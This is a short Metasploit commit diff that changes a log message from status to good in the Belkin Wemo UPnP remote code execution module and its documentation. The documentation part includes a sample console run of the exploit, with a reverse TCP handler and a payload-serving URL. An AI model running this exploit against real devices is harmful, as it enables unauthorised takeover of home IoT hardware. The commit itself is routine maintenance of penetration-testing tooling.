Land #11516, reverted print for Wemo exploit

4.x
William Vu 2019-03-04 18:24:42 -06:00 committed by Metasploit
parent 0f583f1e49
commit c471f1ddb3
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 2 additions and 2 deletions

View File

@ -32,7 +32,7 @@ for Crock-Pot and 49153 for other devices.
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
[*] Started reverse TCP handler on 10.22.22.4:4444
[*] Wemo-enabled device detected
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6

View File

@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
return checkcode
end
vprint_status('Wemo-enabled device detected')
vprint_good('Wemo-enabled device detected')
checkcode = CheckCode::Detected
version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&